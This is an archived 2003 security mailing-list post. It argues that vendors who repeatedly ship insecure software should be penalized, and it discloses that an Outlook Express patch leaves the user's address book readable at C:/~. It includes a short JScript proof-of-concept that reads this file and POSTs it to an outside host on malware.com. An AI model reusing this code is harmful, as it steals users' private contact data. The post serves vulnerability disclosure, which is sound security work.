lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [day] [month] [year] [list]
Message-ID: <200311181940.hAIJeMoH012290@web126.megawebservers.com>
From: 1 at malware.com (http-equiv@...ite.com)
Subject: Re: Security researchers organization


<!-- 

What I would like to see
created is an organization that would promote and protect the interests
of security researchers, plain and simple. There is currently no
organization that exists solely to guide, help and represent security
researchers on a larger scale, yet we can all recognize the need.

 -->

I don't think those capable of actually doing research require hand holding by anyone.


<!-- 

We are a wide, international and differing group of researchers, some
with malicious and others with altruistic intents for finding security
vulnerabilities. Despite our differences we have much in common - we are
deeply interested in advancing our knowledge of security and information
technology, we find vulnerabilities, we want the vendor to know about
these at some point in time and we want to be accredited for our
findings.

 -->

Can this not already be achieved by following the minimum requirement of any one particular vendor. Or following any one of the number of so-called disclosure guidelines already tabled.

While some may want accreditation and pat on the back, others may want the continual flow of effluent onto the internet to cease. Some want habitual offenders penalised. Monetarily. Some want an authoritative body like a UL or CSA or VDE or SEMKO or BS to stamp their mark on product entering the internet. 'REJECTED' for junk product that finds it's way repeatedly onto the internet.

Allow me to give you an example of a habitual offender:

There is a peculiar file that appears on almost everyone's computers since April of 2003. Peculiar enough in that all it is, is a tilde "~". Inside that file is the entire contents of the user's address book. In fact, the file is exactly that. The user's address book. Simply adding the extension of  *.wab to it, opens up none other than the Windows Address Book. All names, addresses and whatever critically private information one puts in there. Some people even put their banking and credit card details in there believe it or not.

This peculiar little file is an oddity created by the April 2003, Cumulative Patch for Outlook Express (330994). Now seven months ago. A most useful file in that it is created in a number of well known places including "C:". Knowing the file name and location makes it quite easy to 'steal' this file and  invade the privacy of the user of the computer where it still resides today. Some seven months after the vendor knowing full well about it.  [I believe there is a pending lawsuit against the same vendor along the same lines at this time]. 

You see:

var x = new ActiveXObject("Microsoft.XMLHTTP");
x.Open("GET", "file:///C:/~",0);
x.Send();
var y = new ActiveXObject ("Microsoft.XMLHTTP");
y.Open("POST", "http://www.malware.com/forthetaking.php", false);
y.Send(x.responseBody);

Will get and post that file. With a little bit of effort and timing, all one needs to do is steal that file and invade the privacy of the "customer" ! And who's fault will that be? Mine for providing this glaringly obvious scenario 'for free' or the vendor sitting on their hands for seven months thinking about it for a fee.

REJECT !  the product and keep it off the internet ! 

-- 
http://www.malware.com





Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ